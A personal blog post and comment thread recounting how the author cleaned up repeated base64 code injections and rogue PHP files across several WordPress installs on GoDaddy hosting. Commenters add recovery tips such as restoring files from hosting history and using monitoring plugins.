Seems like more and more, I see people having a terrible time with their WordPress installs being hacked. While I’m no expert on the internets, or security, or anything like that….I did suffer through 2 rounds of attacks here on The Voodoo Empire, and recovered fully….and learned a lot. So here is the process I went through. The first time I wasn’t thorough enough, and that is how it happened again. I’ve been clean for months now, after doing things properly the second time. Before I describe my process, here are some great reads that pretty much set me straight and got me going on the cleanup process.
These got me going through the cleanup process, and one other good link, after you get everything cleaned up:
So that’s the required reading out of the way….now onto my process.
I first noticed some gibberesh (the base64 stuff) showing up in my theme’s files when I went in to do some editing. It had been months since I had worked on my theme, so who knows how long the spam had been in there. I deleted all the rogue code from all my theme’s files and thought I was golden. Until it showed up again, I layed the find and delete game for some time…..but it kept coming back. Then I started to dig around some more…..The Voodoo Empire has 5 WordPress installs, and at the time we had Drupal, Joomla, ZenCart, MediaWiki, and many other software packages. This totals up to a few thousand php files on the server. Each and every php file had the base64 stuff in it. So next up, every php file was either cleaned, or replaced. I thought I’d had it beat. A month later it was back. I’d developed the habit of viewing my source code from within my browser each time I visited my websites now to look for bad stuff. But this time, even though there was spam in my source code, there wasn’t any files altered. So I dug and dug, and finally found a php file that didn’t belong buried about 4 level deep. It was inserting spam links. I deleted it and thought I was good. But alas, it was too good to be true…..soon, all my php files on my server got altered again. This time though, I did some research and finally cleaned up properly.
First thing I did was change all my passwords. FTP, WP (and all other programs), all DB passwords, etc. After I changed all my passwords, I took a look at one of the files that had been altered, and checked out it’s timestamp. My host (GoDaddy) offers server access logs to peruse at my leisure (if you’ve never seen an access log, they are scary). I had no idea what was in a log, I’d never seen one, but I decided to dive in. I checked my access logs agains the times that the altered files had last been changed and found that a rogue php file buried way deep in the 2008 uploads folder of a different WP install was affecting my main WP install. Upon further investigation, I found another rogue php file that was altering my other files. So I deleted the rogue php files. I then reinstalled every single software package on my server. Then I went in and manually cleaned the rest of the php files that didn’t get replaced (WP theme files, wp-config file, etc). After that it was on to plugins. I deleted all plugins and installed from clean downloads. So now every php file on my server was accounted for, and clean. No rogue php files existed anywhere. No rogue code was added on to any of my existing php files.
It was time to finish thing up….on to the database. I manually scanned through exports of my database looking for any suspicious code that I found, and ran some basic sql queries on my existing database looking for suspicious code, and got my database all squeeky clean. And now, with everything nice and clean, I changed up all my passwords once again.
There you have it! My long and painful travel to a clean WP. Keep everything up to date, WP installs, themes, plugins, etc. Check your source code often. Maybe install some of the various security plugins that are out there (none of them stopped my attacks, but they do have a use). And if you do get hacked…..be thorough. If you are not, you are just wasting your time! Remember, server access logs can be your friend! Hopefully you can avoid being hacked, if you are reading this because it happened to you, I hope I helped you just a little, be patient, be thorough, and good luck!
Check out my post here if you are looking for more information on rogue files, and using your access logs to find them.
This happened to my website too :(( And thank you so much for posting your experience online. I also have my site hosted by Godaddy. My question though, I already went to the godaddy access log but can you share with me what the rouge php files look like? I have no programming experience at all and this is very scary experience. Here's my site address that has the problem, http://www.sci-health.org
Thank you so much for your insights on this.
Well, I hope I can help you out just a little. My reply is a bit too long to make as a comment, so I will make a new post here on https://www.rvoodoo.com about how to use your access logs. Hope it helps!
Ohh, awesome!! Thank you so much, you definitely helped a lot!!
Sweet! I’m glad! Nobody wants a hacked site!
Rev. Voodoo thanks for sharing your unbelievable, but so true, story with us. I have heard so many people go through this same thing time and time again.
Your right, you didn’t get all the files removed so it replicated itself. It’s such a nightmare and I feel for you!
I wanted to give you a bit of time saving advice. Since you’re on addy, you have access to the “File Manager.” It has a snapshot/copy of each and every single file/directory for the last 30 days of your entire hosting account. Once you figure out what day you were hacked, you simply go to “History” and “Restore” each directory to the day before.
Important – You have to delete ALL the files on the “Current” tab first so it will remove everything that may have been infected. Your site will be down during this process, but it doesn’t take very long.
You can find out more on how to do this at http://community.godaddy.com/help/2009/02/02/restoring-a-linux-hosting-account/
Also, you might want to try using the WordPress File Monitor that will email you whenever one of your site files changes.
Sweet, thanks for the suggestions! I wasn’t actually all that familiar with the godaddy history business….thats cool, Ill hafta look into it! Ill check out the plugin too….that could be cool
i had this same problem… im so glad i found WPsecurityLock’s comment. It was extremely helpful and saved me days. i had no clue godaddy stored so much information about files.
I got hacked. and i have linux on godaddy with wordpress – even with an up to date wordpress version updated.. it screwed my dashboard and messed up the website. its down now… it really sucks. whoever is behind this. please arrest them!!
Hey there, good article. I linked to your site.. I was writing an article on WordPress security plugins, and added you for extra reading. – http://moneydiary.net/secure-wordpress/
Thank you! I was cruising around your site….. a lot of good info there! I’ll definitely be checking it out some more!
You neither need to exchange files nor to re-install WP nor to remove code by hand,you find 2 cleanup scripts on my website
Rename those 2 tiny files to whatever you like.
Put them in your domain’s root, run both files via Browser and see and fix the infected files.
Greetinx from Austria,
Seems cool! I prefer to investigate things manually, and then do my own cleanup. But if your tools work, and are helpful to others…. that’s great!
I can attest that this tool works very well – it seems to have cured this worm on several of my WordPress installations (at least for now – who knows if it will come back). I’m on a shared server with about 25 WP installations, so manually removing this would have taken me forever!
Excellent, thanks for letting us know you had success with that tool!
Thanks for sharing this site!
No problem! I hope my article was helpful… if you need further help, check out my WP specific site at voodoopress.com, I have plenty of articles there, and try to answer all comments and requests!
here is an online base64 decode tool http://base64decode.net
decoding the base64 might be interesting, but th eimportant ting is more how did it get there in the first place.